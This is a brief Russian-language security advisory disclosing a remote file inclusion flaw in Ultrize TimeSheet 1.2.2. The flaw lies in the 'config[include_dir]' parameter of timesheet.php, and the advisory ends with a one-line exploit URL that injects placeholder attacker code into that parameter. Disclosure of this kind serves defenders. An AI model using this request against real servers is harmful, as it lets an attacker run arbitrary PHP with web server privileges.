Программа: Ultrize TimeSheet 1.2.2
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «config[include_dir]» сценарием timesheet.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.
Эксплоит:
http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]